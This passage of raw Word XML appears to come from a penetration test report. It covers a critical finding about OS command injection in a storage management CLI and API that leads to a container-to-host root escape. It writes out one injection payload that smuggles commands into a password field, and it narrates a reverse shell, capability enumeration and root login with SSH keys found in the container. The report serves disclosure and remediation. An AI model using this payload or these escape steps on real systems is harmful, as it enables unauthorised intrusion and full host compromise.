                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="467006A8" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>As a best practice it is recommended not to run SSH service in a pod and do not disclose sensitive data like SSH keys inside containers. Instead, run SSH on the host and use docker exec or docker attach to interact with the container.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08FA6A02" w14:textId="77777777" w:rsidR="005C1BB5" w:rsidRDefault="005C1BB5" w:rsidP="00F9075A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ECDEE85" w14:textId="77777777" w:rsidR="00B36CFB" w:rsidRDefault="00B36CFB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0077B3"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0077B3"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8DCCCF" w14:textId="25404CC5" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc200562849"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0077B3"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CLI Security Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="31FF89F9" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="008D4522">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId57" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=195190">
        <w:bookmarkStart w:id="45" w:name="_Toc200560997"/>
        <w:bookmarkStart w:id="46" w:name="_Toc200562850"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>195190: Container To Host Escape Via RCE And SSH Credentials  </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="CC0500"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Critical)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>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8D4522" w14:paraId="7B2797AE" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="335CE781" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E2A15BC" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>OS Command Injection occurs when an application unsafely passes user input into a system shell or OS command. If input is not properly sanitized, an attacker can inject arbitrary commands and gain control over the system. The CLI API endpoints constructs all or part of an operating system (OS) command using externally-influenced input from an upstream component. However, it fails to properly neutralize or incorrectly neutralizes special elements that could alter the intended OS command when sent to a downstream component.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F9086EA" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6694B2FF" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">It was observed that the CLI commands and API endpoints are vulnerable to Remote Code Execution (RCE), allowing us to inject OS commands and retrieve their output in the response. By leveraging this, we successfully obtained a reverse shell on the containerized target host and ultimately compromised the host with root-level access. This was possible due to the fact that the container in question had ssh keys of the host. An attacker who access the container via any API vulnerability would use these keys to breakout of the isolated container leading to complete compromise of the cluster. Keeping these cases in mind, as per security best practices, it is always important to avoid hosting SSH </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>deamon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> to be part of the runtime containers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71A3C15E" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="146216C2" w14:textId="2F86B809" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://www.tenable.com/audits/items/CIS_Docker_1.11.0_v1.0.0_L1.audit:b690a3daa8524fea816e18868ccedb80</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="120FC262" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1325DBC0" w14:textId="77777777" w:rsidR="008D4522" w:rsidRPr="00E77A74" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E77A74">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Steps to Reproduce:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0458D5A8" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">1. There are 2 ways to perform this attack. One with CLI command by executing the malicious payload in the username or password field. In this case: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F094D02" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>lpp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mmfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>essctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>essmgmt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> copy-ssh-id --hostname </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>utilityBareMetal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> --password </w:t>
            </w:r>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>cluster|echo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> test hello||a #' |id||a #|\" |echo </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dlqdofdsdq</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8gorcmjfyy||a #"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> --username root --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>utilityBareMetal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> --insecure-skip-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A2754E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-verify</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> which reveals users id details.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02DC260D" w14:textId="1EC7185D" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">2. The other way is from API endpoint. Access the </w:t>
            </w:r>
            <w:hyperlink r:id="rId58" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="002C25B8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                  <w:color w:val="0532FE"/>
                </w:rPr>
                <w:t>Essmgmt</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="002C25B8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                  <w:color w:val="0532FE"/>
                </w:rPr>
                <w:t xml:space="preserve"> Service</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> endpoint</w:t>
            </w:r>
            <w:r w:rsidR="002C25B8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>which is a POST request.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52AC741F" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>2. As shown in the screenshot, we injected an OS command payload using multiple concatenations within the username and password parameters, both of which were found to be vulnerable.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CEFBA55" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>3. It was observed that the crafted command with the concatenation is being executed and its output is reflected in the response.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53CC1D07" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">4. By injecting system commands such as id and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> etc, we were able to view their output in the application's response.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="588280B0" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>5. Therefore, we injected a reverse shell to obtain an interactive session. Upon successful execution, we gained a reverse shell within the container, as shown in the screenshot.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="218FD667" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>6. The obtained shell user is a non-root user, therefore we did further reconnaissance on the container machine for privilege escalation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2620E790" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">7. We ran the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006600DB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>getcap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006600DB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve"> -r / 2&gt;&gt; /dev/null</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to discover binaries with special privileges that could potentially lead to privilege escalation. While some interesting capabilities were found, they could not be exploited due to implemented restrictions.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5760575A" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">8. Upon further enumeration of important directories, we identified SSH key pairs located in the </w:t>
            </w:r>
            <w:r w:rsidRPr="006600DB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>/var/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006600DB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>mmfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006600DB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006600DB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>scaleadm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> directory.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02CB6A20" w14:textId="02B5F977" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="009A3182">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>9. Using the SSH private key, we were able to log in as the root user on the host machine, ultimately leading to full compromise of the host with root-level access.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50B2EC7F" w14:textId="7701C8C4" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:jc w:val="distribute"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07F5ADDF" wp14:editId="67A2CB7B">
                  <wp:extent cx="5928995" cy="564543"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1874703611" name="Drawing 19" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 19" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId59"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
